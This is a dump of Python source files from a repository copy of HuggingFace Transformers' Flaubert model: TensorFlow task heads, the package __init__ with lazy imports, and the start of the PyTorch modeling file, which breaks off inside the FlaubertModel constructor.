            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        end_positions (`tf.Tensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the end of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        """
        transformer_outputs = self.transformer(
            input_ids=input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        sequence_output = transformer_outputs[0]

        logits = self.qa_outputs(sequence_output)
        # Last axis holds [start, end]; split and drop the singleton dimension.
        start_logits, end_logits = tf.split(logits, 2, axis=-1)
        start_logits = tf.squeeze(start_logits, axis=-1)
        end_logits = tf.squeeze(end_logits, axis=-1)

        loss = None
        if start_positions is not None and end_positions is not None:
            labels = {"start_position": start_positions}
            labels["end_position"] = end_positions
            loss = self.hf_compute_loss(labels, (start_logits, end_logits))

        if not return_dict:
            output = (start_logits, end_logits) + transformer_outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return TFQuestionAnsweringModelOutput(
            loss=loss,
            start_logits=start_logits,
            end_logits=end_logits,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )

    # Copied from transformers.models.bert.modeling_tf_bert.TFBertForQuestionAnswering.serving_output
    def serving_output(self, output: TFQuestionAnsweringModelOutput) -> TFQuestionAnsweringModelOutput:
        # Convert tuple-typed outputs to dense tensors for the SavedModel serving signature.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None

        return TFQuestionAnsweringModelOutput(
            start_logits=output.start_logits, end_logits=output.end_logits, hidden_states=hs, attentions=attns
        )
@add_start_docstrings(
    """
    Flaubert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
    Named-Entity-Recognition (NER) tasks.
    """,
    FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMForTokenClassification with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class TFFlaubertForTokenClassification(TFFlaubertPreTrainedModel, TFTokenClassificationLoss):
    def __init__(self, config, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        self.num_labels = config.num_labels

        self.transformer = TFFlaubertMainLayer(config, name="transformer")
        self.dropout = tf.keras.layers.Dropout(config.dropout)
        # Per-token classifier applied to every hidden state.
        self.classifier = tf.keras.layers.Dense(
            config.num_labels, kernel_initializer=get_initializer(config.init_std), name="classifier"
        )

    @unpack_inputs
    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TFTokenClassifierOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def call(
        self,
        input_ids: Optional[TFModelInputType] = None,
        attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
        token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
        cache: Optional[Dict[str, tf.Tensor]] = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
        training: bool = False,
    ) -> Union[TFTokenClassifierOutput, Tuple[tf.Tensor]]:
        r"""
        labels (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.
        """
        transformer_outputs = self.transformer(
            input_ids=input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        sequence_output = transformer_outputs[0]

        sequence_output = self.dropout(sequence_output, training=training)
        logits = self.classifier(sequence_output)

        loss = None if labels is None else self.hf_compute_loss(labels, logits)

        if not return_dict:
            output = (logits,) + transformer_outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return TFTokenClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )

    # Copied from transformers.models.bert.modeling_tf_bert.TFBertForTokenClassification.serving_output
    def serving_output(self, output: TFTokenClassifierOutput) -> TFTokenClassifierOutput:
        # Convert tuple-typed outputs to dense tensors for the SavedModel serving signature.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None

        return TFTokenClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
    """
    Flaubert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
    softmax) e.g. for RocStories/SWAG tasks.
    """,
    FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMForMultipleChoice with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class TFFlaubertForMultipleChoice(TFFlaubertPreTrainedModel, TFMultipleChoiceLoss):
    def __init__(self, config, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)

        self.transformer = TFFlaubertMainLayer(config, name="transformer")
        self.sequence_summary = TFSequenceSummary(config, initializer_range=config.init_std, name="sequence_summary")
        # Projects the pooled representation to a single score per choice.
        self.logits_proj = tf.keras.layers.Dense(
            1, kernel_initializer=get_initializer(config.initializer_range), name="logits_proj"
        )

    @property
    def dummy_inputs(self):
        """
        Dummy inputs to build the network.

        Returns:
            tf.Tensor with dummy inputs
        """
        # Sometimes Flaubert has language embeddings so don't forget to build them as well if needed
        if self.config.use_lang_emb and self.config.n_langs > 1:
            return {
                "input_ids": tf.constant(MULTIPLE_CHOICE_DUMMY_INPUTS, dtype=tf.int32),
                "langs": tf.constant(MULTIPLE_CHOICE_DUMMY_INPUTS, dtype=tf.int32),
            }
        else:
            return {
                "input_ids": tf.constant(MULTIPLE_CHOICE_DUMMY_INPUTS, dtype=tf.int32),
            }

    @unpack_inputs
    @add_start_docstrings_to_model_forward(
        FLAUBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")
    )
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TFMultipleChoiceModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def call(
        self,
        input_ids: Optional[TFModelInputType] = None,
        attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
        token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
        lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
        cache: Optional[Dict[str, tf.Tensor]] = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
        training: bool = False,
    ) -> Union[TFMultipleChoiceModelOutput, Tuple[tf.Tensor]]:
        # Inputs arrive as (batch, num_choices, seq_len); flatten the first two
        # dims so the base transformer sees an ordinary 2D batch.
        if input_ids is not None:
            num_choices = shape_list(input_ids)[1]
            seq_length = shape_list(input_ids)[2]
        else:
            num_choices = shape_list(inputs_embeds)[1]
            seq_length = shape_list(inputs_embeds)[2]

        flat_input_ids = tf.reshape(input_ids, (-1, seq_length)) if input_ids is not None else None
        flat_attention_mask = tf.reshape(attention_mask, (-1, seq_length)) if attention_mask is not None else None
        flat_token_type_ids = tf.reshape(token_type_ids, (-1, seq_length)) if token_type_ids is not None else None
        flat_position_ids = tf.reshape(position_ids, (-1, seq_length)) if position_ids is not None else None
        flat_langs = tf.reshape(langs, (-1, seq_length)) if langs is not None else None
        flat_inputs_embeds = (
            tf.reshape(inputs_embeds, (-1, seq_length, shape_list(inputs_embeds)[3]))
            if inputs_embeds is not None
            else None
        )

        if lengths is not None:
            logger.warning(
                "The `lengths` parameter cannot be used with the Flaubert multiple choice models. Please use the "
                "attention mask instead.",
            )
            lengths = None

        transformer_outputs = self.transformer(
            flat_input_ids,
            flat_attention_mask,
            flat_langs,
            flat_token_type_ids,
            flat_position_ids,
            lengths,
            cache,
            head_mask,
            flat_inputs_embeds,
            output_attentions,
            output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        output = transformer_outputs[0]
        logits = self.sequence_summary(output)
        logits = self.logits_proj(logits)
        # Un-flatten back to one score per (example, choice).
        reshaped_logits = tf.reshape(logits, (-1, num_choices))

        loss = None if labels is None else self.hf_compute_loss(labels, reshaped_logits)

        if not return_dict:
            output = (reshaped_logits,) + transformer_outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return TFMultipleChoiceModelOutput(
            loss=loss,
            logits=reshaped_logits,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )

    @tf.function(
        input_signature=[
            {
                "input_ids": tf.TensorSpec((None, None, None), tf.int32, name="input_ids"),
                "attention_mask": tf.TensorSpec((None, None, None), tf.int32, name="attention_mask"),
                "token_type_ids": tf.TensorSpec((None, None, None), tf.int32, name="token_type_ids"),
            }
        ]
    )
    # Copied from transformers.models.bert.modeling_tf_bert.TFBertForMultipleChoice.serving
    def serving(self, inputs: Dict[str, tf.Tensor]):
        # The input dict is routed through `input_ids`; @unpack_inputs on `call` unpacks it.
        output = self.call(input_ids=inputs)

        return self.serving_output(output)

    # Copied from transformers.models.bert.modeling_tf_bert.TFBertForMultipleChoice.serving_output
    def serving_output(self, output: TFMultipleChoiceModelOutput) -> TFMultipleChoiceModelOutput:
        # Convert tuple-typed outputs to dense tensors for the SavedModel serving signature.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None

        return TFMultipleChoiceModelOutput(logits=output.logits, hidden_states=hs, attentions=attns)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 3,488 | src/transformers/models/flaubert/__init__.py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_tf_available, is_torch_available
# Mapping of submodule name -> public names it exports; used by _LazyModule so
# heavy submodules are only imported when one of their names is first accessed.
_import_structure = {
    "configuration_flaubert": ["FLAUBERT_PRETRAINED_CONFIG_ARCHIVE_MAP", "FlaubertConfig", "FlaubertOnnxConfig"],
    "tokenization_flaubert": ["FlaubertTokenizer"],
}

# PyTorch models are only registered when torch is installed.
try:
    if not is_torch_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_flaubert"] = [
        "FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST",
        "FlaubertForMultipleChoice",
        "FlaubertForQuestionAnswering",
        "FlaubertForQuestionAnsweringSimple",
        "FlaubertForSequenceClassification",
        "FlaubertForTokenClassification",
        "FlaubertModel",
        "FlaubertWithLMHeadModel",
        "FlaubertPreTrainedModel",
    ]

# TensorFlow models are only registered when tensorflow is installed.
try:
    if not is_tf_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_tf_flaubert"] = [
        "TF_FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST",
        "TFFlaubertForMultipleChoice",
        "TFFlaubertForQuestionAnsweringSimple",
        "TFFlaubertForSequenceClassification",
        "TFFlaubertForTokenClassification",
        "TFFlaubertModel",
        "TFFlaubertPreTrainedModel",
        "TFFlaubertWithLMHeadModel",
    ]


# Under static type checking the real imports are used so tools see the symbols;
# at runtime the module object is replaced by a _LazyModule instead.
if TYPE_CHECKING:
    from .configuration_flaubert import FLAUBERT_PRETRAINED_CONFIG_ARCHIVE_MAP, FlaubertConfig, FlaubertOnnxConfig
    from .tokenization_flaubert import FlaubertTokenizer

    try:
        if not is_torch_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_flaubert import (
            FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST,
            FlaubertForMultipleChoice,
            FlaubertForQuestionAnswering,
            FlaubertForQuestionAnsweringSimple,
            FlaubertForSequenceClassification,
            FlaubertForTokenClassification,
            FlaubertModel,
            FlaubertPreTrainedModel,
            FlaubertWithLMHeadModel,
        )

    try:
        if not is_tf_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_tf_flaubert import (
            TF_FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST,
            TFFlaubertForMultipleChoice,
            TFFlaubertForQuestionAnsweringSimple,
            TFFlaubertForSequenceClassification,
            TFFlaubertForTokenClassification,
            TFFlaubertModel,
            TFFlaubertPreTrainedModel,
            TFFlaubertWithLMHeadModel,
        )

else:
    import sys

    # Replace this module with a lazy proxy that imports submodules on demand.
    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 57,783 | src/transformers/models/flaubert/modeling_flaubert.py | # coding=utf-8
# Copyright 2019-present CNRS, Facebook Inc. and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch Flaubert model, based on XLM."""
import itertools
import math
import random
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import numpy as np
import torch
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ...activations import gelu
from ...modeling_outputs import (
BaseModelOutput,
MaskedLMOutput,
MultipleChoiceModelOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from ...modeling_utils import PreTrainedModel, SequenceSummary, SQuADHead
from ...pytorch_utils import apply_chunking_to_forward, find_pruneable_heads_and_indices, prune_linear_layer
from ...utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_flaubert import FlaubertConfig
logger = logging.get_logger(__name__)

# Default checkpoint and config class names injected into generated docstrings.
_CHECKPOINT_FOR_DOC = "flaubert/flaubert_base_cased"
_CONFIG_FOR_DOC = "FlaubertConfig"

# Hub identifiers of the official pretrained Flaubert checkpoints.
FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
    "flaubert/flaubert_small_cased",
    "flaubert/flaubert_base_uncased",
    "flaubert/flaubert_base_cased",
    "flaubert/flaubert_large_cased",
    # See all Flaubert models at https://huggingface.co/models?filter=flaubert
]
# Copied from transformers.models.xlm.modeling_xlm.create_sinusoidal_embeddings
def create_sinusoidal_embeddings(n_pos, dim, out):
position_enc = np.array([[pos / np.power(10000, 2 * (j // 2) / dim) for j in range(dim)] for pos in range(n_pos)])
out[:, 0::2] = torch.FloatTensor(np.sin(position_enc[:, 0::2]))
out[:, 1::2] = torch.FloatTensor(np.cos(position_enc[:, 1::2]))
out.detach_()
out.requires_grad = False
# Copied from transformers.models.xlm.modeling_xlm.get_masks
def get_masks(slen, lengths, causal, padding_mask=None):
    """Build the per-token validity mask and the attention mask for a batch.

    Returns `(mask, attn_mask)` where `mask` has shape `(bs, slen)` marking real
    (non-padding) positions, and `attn_mask` is either the same `(bs, slen)`
    mask, or a `(bs, slen, slen)` lower-triangular mask when `causal` is True.
    """
    positions = torch.arange(slen, dtype=torch.long, device=lengths.device)
    if padding_mask is None:
        # Derive the mask from the per-sequence lengths.
        assert lengths.max().item() <= slen
        mask = positions < lengths[:, None]
    else:
        mask = padding_mask

    bs = lengths.size(0)
    if causal:
        # attn_mask[b, i, j] is True iff position j may attend... i.e. j <= i.
        attn_mask = positions[None, None, :].repeat(bs, slen, 1) <= positions[None, :, None]
    else:
        attn_mask = mask

    # sanity check
    assert mask.size() == (bs, slen)
    assert causal is False or attn_mask.size() == (bs, slen, slen)

    return mask, attn_mask
# Copied from transformers.models.xlm.modeling_xlm.MultiHeadAttention
class MultiHeadAttention(nn.Module):
    """Multi-head scaled dot-product attention with head pruning and an incremental
    key/value cache for generation (self-attention when `kv` is None, otherwise
    cross-attention over `kv`)."""

    # Class-level counter: every instance gets a unique `layer_id`, which is the
    # key used for this layer's entry in the generation cache.
    NEW_ID = itertools.count()

    def __init__(self, n_heads, dim, config):
        super().__init__()
        self.layer_id = next(MultiHeadAttention.NEW_ID)
        self.dim = dim
        self.n_heads = n_heads
        self.dropout = config.attention_dropout
        # Model width must split evenly across heads.
        assert self.dim % self.n_heads == 0

        self.q_lin = nn.Linear(dim, dim)
        self.k_lin = nn.Linear(dim, dim)
        self.v_lin = nn.Linear(dim, dim)
        self.out_lin = nn.Linear(dim, dim)
        self.pruned_heads = set()

    def prune_heads(self, heads):
        """Remove the given attention heads and shrink the projections accordingly."""
        attention_head_size = self.dim // self.n_heads
        if len(heads) == 0:
            return
        heads, index = find_pruneable_heads_and_indices(heads, self.n_heads, attention_head_size, self.pruned_heads)
        # Prune linear layers
        self.q_lin = prune_linear_layer(self.q_lin, index)
        self.k_lin = prune_linear_layer(self.k_lin, index)
        self.v_lin = prune_linear_layer(self.v_lin, index)
        self.out_lin = prune_linear_layer(self.out_lin, index, dim=1)
        # Update hyper params
        self.n_heads = self.n_heads - len(heads)
        self.dim = attention_head_size * self.n_heads
        self.pruned_heads = self.pruned_heads.union(heads)

    def forward(self, input, mask, kv=None, cache=None, head_mask=None, output_attentions=False):
        """
        Self-attention (if kv is None) or attention over source sentence (provided by kv).
        """
        # Input is (bs, qlen, dim)
        # Mask is (bs, klen) (non-causal) or (bs, klen, klen)
        bs, qlen, dim = input.size()
        if kv is None:
            # With a cache, keys/values cover the previously generated prefix too.
            klen = qlen if cache is None else cache["slen"] + qlen
        else:
            klen = kv.size(1)
        # assert dim == self.dim, f'Dimensions do not match: {dim} input vs {self.dim} configured'
        n_heads = self.n_heads
        dim_per_head = self.dim // n_heads
        mask_reshape = (bs, 1, qlen, klen) if mask.dim() == 3 else (bs, 1, 1, klen)

        def shape(x):
            """projection"""
            return x.view(bs, -1, self.n_heads, dim_per_head).transpose(1, 2)

        def unshape(x):
            """compute context"""
            return x.transpose(1, 2).contiguous().view(bs, -1, self.n_heads * dim_per_head)

        q = shape(self.q_lin(input))  # (bs, n_heads, qlen, dim_per_head)
        if kv is None:
            k = shape(self.k_lin(input))  # (bs, n_heads, qlen, dim_per_head)
            v = shape(self.v_lin(input))  # (bs, n_heads, qlen, dim_per_head)
        elif cache is None or self.layer_id not in cache:
            k = v = kv
            k = shape(self.k_lin(k))  # (bs, n_heads, qlen, dim_per_head)
            v = shape(self.v_lin(v))  # (bs, n_heads, qlen, dim_per_head)

        if cache is not None:
            if self.layer_id in cache:
                if kv is None:
                    # Self-attention: append the new keys/values to the cached prefix.
                    k_, v_ = cache[self.layer_id]
                    k = torch.cat([k_, k], dim=2)  # (bs, n_heads, klen, dim_per_head)
                    v = torch.cat([v_, v], dim=2)  # (bs, n_heads, klen, dim_per_head)
                else:
                    # Cross-attention: the source projections never change, reuse them.
                    k, v = cache[self.layer_id]
            cache[self.layer_id] = (k, v)

        scores = torch.matmul(q, k.transpose(2, 3)) / math.sqrt(dim_per_head)  # (bs, n_heads, qlen, klen)
        # Masked positions get the dtype's minimum so softmax assigns them ~0 weight.
        mask = (mask == 0).view(mask_reshape).expand_as(scores)  # (bs, n_heads, qlen, klen)
        scores.masked_fill_(mask, torch.finfo(scores.dtype).min)  # (bs, n_heads, qlen, klen)

        # Softmax in float32 for numerical stability, then cast back.
        weights = nn.functional.softmax(scores.float(), dim=-1).type_as(scores)  # (bs, n_heads, qlen, klen)
        weights = nn.functional.dropout(weights, p=self.dropout, training=self.training)  # (bs, n_heads, qlen, klen)

        # Mask heads if we want to
        if head_mask is not None:
            weights = weights * head_mask

        context = torch.matmul(weights, v)  # (bs, n_heads, qlen, dim_per_head)
        context = unshape(context)  # (bs, qlen, dim)

        outputs = (self.out_lin(context),)
        if output_attentions:
            outputs = outputs + (weights,)
        return outputs
# Copied from transformers.models.xlm.modeling_xlm.TransformerFFN
class TransformerFFN(nn.Module):
    """Position-wise feed-forward block: linear -> activation -> linear -> dropout,
    optionally evaluated in chunks along the sequence dimension to bound peak memory."""

    def __init__(self, in_dim, dim_hidden, out_dim, config):
        super().__init__()
        self.dropout = config.dropout
        self.lin1 = nn.Linear(in_dim, dim_hidden)
        self.lin2 = nn.Linear(dim_hidden, out_dim)
        # GELU when the config asks for it, plain ReLU otherwise.
        self.act = gelu if config.gelu_activation else nn.functional.relu
        self.chunk_size_feed_forward = config.chunk_size_feed_forward
        # Chunking splits along the sequence (second) dimension.
        self.seq_len_dim = 1

    def forward(self, input):
        return apply_chunking_to_forward(self.ff_chunk, self.chunk_size_feed_forward, self.seq_len_dim, input)

    def ff_chunk(self, input):
        """Apply the two-layer MLP (plus dropout) to one chunk of the sequence."""
        hidden = self.act(self.lin1(input))
        hidden = self.lin2(hidden)
        return nn.functional.dropout(hidden, p=self.dropout, training=self.training)
FLAUBERT_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`FlaubertConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
FLAUBERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
lengths (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Length of each sentence that can be used to avoid performing attention on padding token indices. You can
also use `attention_mask` for the same result (see above), kept here for compatibility. Indices selected in
`[0, ..., input_ids.size(-1)]`:
cache (`Dict[str, torch.FloatTensor]`, *optional*):
Dictionary strings to `torch.FloatTensor` that contains precomputed hidden-states (key and values in the
attention blocks) as computed by the model (see `cache` output below). Can be used to speed up sequential
decoding. The dictionary object will be modified in-place during the forward pass to add newly computed
hidden-states.
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
    "The bare Flaubert Model transformer outputting raw hidden-states without any specific head on top.",
    FLAUBERT_START_DOCSTRING,
)
# NOTE(review): the `add_start_docstrings` text above reads like it was written for
# `FlaubertModel`, not for this prediction head — it looks displaced by whatever
# assembled this file; confirm against upstream `modeling_flaubert.py`.
# Copied from transformers.models.xlm.modeling_xlm.XLMPredLayer with XLM->Flaubert
class FlaubertPredLayer(nn.Module):
    """
    Prediction layer (cross_entropy or adaptive_softmax).
    """

    def __init__(self, config):
        super().__init__()
        self.asm = config.asm
        self.n_words = config.n_words
        self.pad_index = config.pad_index
        if config.asm is False:
            # Plain vocabulary projection; loss is standard cross-entropy.
            self.proj = nn.Linear(config.emb_dim, config.n_words, bias=True)
        else:
            # Adaptive softmax for very large vocabularies.
            self.proj = nn.AdaptiveLogSoftmaxWithLoss(
                in_features=config.emb_dim,
                n_classes=config.n_words,
                cutoffs=config.asm_cutoffs,
                div_value=config.asm_div_value,
                head_bias=True,  # default is False
            )

    def forward(self, x, y=None):
        """Compute the scores and, when targets `y` are given, also the loss.

        Returns `(scores,)` without targets, `(loss, scores)` with targets.
        """
        if self.asm is False:
            scores = self.proj(x)
            if y is None:
                return (scores,)
            loss = nn.functional.cross_entropy(scores.view(-1, self.n_words), y.view(-1), reduction="mean")
            return (loss, scores)

        scores = self.proj.log_prob(x)
        if y is None:
            return (scores,)
        _, loss = self.proj(x, y)
        return (loss, scores)
# Copied from transformers.models.xlm.modeling_xlm.XLMPreTrainedModel with XLM->Flaubert
class FlaubertPreTrainedModel(PreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """

    config_class = FlaubertConfig
    load_tf_weights = None
    base_model_prefix = "transformer"

    def __init__(self, *inputs, **kwargs):
        super().__init__(*inputs, **kwargs)

    @property
    def dummy_inputs(self):
        """Small fixed inputs (e.g. for tracing); language ids only when lang embeddings are in use."""
        input_ids = torch.tensor([[7, 6, 0, 0, 1], [1, 2, 3, 0, 0], [0, 0, 0, 4, 5]])
        attention_mask = torch.tensor([[1, 1, 0, 0, 1], [1, 1, 1, 0, 0], [1, 0, 0, 1, 1]])
        if self.config.use_lang_emb and self.config.n_langs > 1:
            langs = torch.tensor([[1, 1, 0, 0, 1], [1, 1, 1, 0, 0], [1, 0, 0, 1, 1]])
        else:
            langs = None
        return {"input_ids": input_ids, "attention_mask": attention_mask, "langs": langs}

    def _init_weights(self, module):
        """Initialize the weights: normal init for embeddings/linears, unit LayerNorm."""
        cfg = self.config
        if isinstance(module, nn.Embedding):
            if cfg is not None and cfg.embed_init_std is not None:
                nn.init.normal_(module.weight, mean=0, std=cfg.embed_init_std)
            if module.padding_idx is not None:
                module.weight.data[module.padding_idx].zero_()
        if isinstance(module, nn.Linear):
            if cfg is not None and cfg.init_std is not None:
                nn.init.normal_(module.weight, mean=0, std=cfg.init_std)
            if module.bias is not None:
                nn.init.constant_(module.bias, 0.0)
        if isinstance(module, nn.LayerNorm):
            module.bias.data.zero_()
            module.weight.data.fill_(1.0)
class FlaubertModel(FlaubertPreTrainedModel):
    """
    The bare Flaubert transformer encoder (no task head): token/position/language
    embeddings followed by `n_layers` self-attention + FFN blocks, returning raw
    hidden states.

    Fix vs. previous revision: `register_buffer("position_ids", ...)` was called
    twice in `__init__` — the first (persistent) registration was dead code,
    immediately overwritten by the second, non-persistent one. Only the
    non-persistent registration is kept.
    """

    _keys_to_ignore_on_load_missing = [r"position_ids"]

    def __init__(self, config):  # , dico, is_encoder, with_output):
        super().__init__(config)

        # encoder / decoder, output layer
        self.is_encoder = config.is_encoder
        self.is_decoder = not config.is_encoder
        if self.is_decoder:
            raise NotImplementedError("Currently Flaubert can only be used as an encoder")
        # self.with_output = with_output
        self.causal = config.causal

        # dictionary / languages
        self.n_langs = config.n_langs
        self.use_lang_emb = config.use_lang_emb
        self.n_words = config.n_words
        self.eos_index = config.eos_index
        self.pad_index = config.pad_index
        # self.dico = dico
        # self.id2lang = config.id2lang
        # self.lang2id = config.lang2id
        # assert len(self.dico) == self.n_words
        # assert len(self.id2lang) == len(self.lang2id) == self.n_langs

        # model parameters
